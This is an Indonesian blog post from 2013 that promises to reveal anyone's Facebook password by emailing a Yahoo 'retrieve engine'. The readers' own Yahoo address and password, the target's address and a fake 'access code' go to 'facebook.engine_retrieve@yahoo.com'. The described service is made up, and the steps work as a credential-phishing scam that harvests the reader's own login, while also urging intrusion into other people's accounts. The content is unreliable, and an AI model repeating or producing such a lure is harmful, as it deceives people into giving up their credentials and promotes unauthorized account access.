Jumat, 24 Mei 2013
0 komentar

Cara Hack Facebook Melalui Email Yahoo

15.02



Facebook & Yahoo
Tak banyak yang tau kalau ternyata Facebook dan Yahoo menjalin sebuah kerja sama yang unik, hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yg kebetulan juga baru mendapatkan informasi ini.
Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account facebook seseorang dengan sangat mudah.
Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yg di incar.
Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yg tepat.
Dan sama sekali tidak memerlukan software…!!
Oke, Gak perlu panjang lebar kali yee.. :P
Berikut ini saya tuliskan caranya:
1. login ke yahoo.
Ingat..!! account yahoo anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat yg anda gunakan pada saat registrasi facebook. Yahoo akan dengan otomatis menolak email yg tidak terhubung dengan Facebook.
2. Jika sudah masuk ke yahoo, tulislah sebuah email yang ditujukan untuk retrieve engine facebook di Yahoo dengan alamat: facebook.engine_retrieve@yahoo.com
3. Pada kolom subject ketik kalimat : PASSWORD RETRIEVE
4. Pada baris pertama isi email, tuliskan alamat email yahoo kamu yang terhubung / terintegrasi dengan facebook dan diawaliAUTOUSER:(Spasi)
5. Pada baris kedua, masukkan alamat email / link account facebook calon korban dengan diawali AUTOSEARCHING:(Spasi)
6. Pada baris ketiga, tuliskan password yahoo kamu yg terintegrasi atau terhubung dengan facebook dan diawali dengan LOGID:(Spasi)
7. Dan di baris terakhir masukkan kode : cgi-bin/$et76431&pwrsa.FB
(kode Access Level ini dibutuhkan untuk verifikasi email anda dengan facebook, jangan sampai salah tulis..)
Contoh penulisan / format pengiriman :
———————————————————————————
To: facebook.engine_retrieve@yahoo.com
bcc: cc: (biarkan kosong)
Subject: PASSWORD RETRIEVE
———————————————————————————
AUTOUSER: saya@yahoo.com                                               <-  (Alamat email yahoo kamu yg terintegrasi dengan facebook)
AUTOSEARCHING: korban@yahoo.com atau http://www.facebook.com/korban
LOGID: 123456                                                                            <- (Password yahoo kamu yg terintegrasi dengan facebook)
cgi-bin/$et76431&pwrsa.FB


Selanjutnya setelah email tersebut terkirim anda akan mendapatkan balasan secara otomatis dari yahoo dengan subject:System Reg Message
buka email tersebut, dan Tadaaaa..!! password pun berhasil didapat.. kalo kata Dora, Berhasil!! Berhasil!! Hore!! :Dhahaha..
Selamat mencoba… :D
Note:
Server yahoo akan secara otomatis melakukan login untuk mengkonfirmasi valid atau tidaknya email kamu, dengan kata lain server yahoo akan meng-extract password dari email calon korban dengan menggunakan password kamu. oleh karena itu password yang kamu masukkan akan menentukan berhasil atau tidaknya usaha kamu.
Biasanya yahoo memerlukan waktu sekitar 1-5 menit untuk mengkonfirmasikan dan meng-extract password yang kamu minta.
Cara di atas juga dapat digunakan untuk mengembalikan account Facebook lama kamu yang sudah dihack (selama account facebook yang telah dihack tersebut masih menggunakan email yahoo yang sama), karena nantinya password yang kamu terima setelah proses pengiriman (dengan format di atas) akan menjadi sama dengan password yahoo yg kamu masukkan.

0 komentar:

Posting Komentar

 
Toggle Footer
Top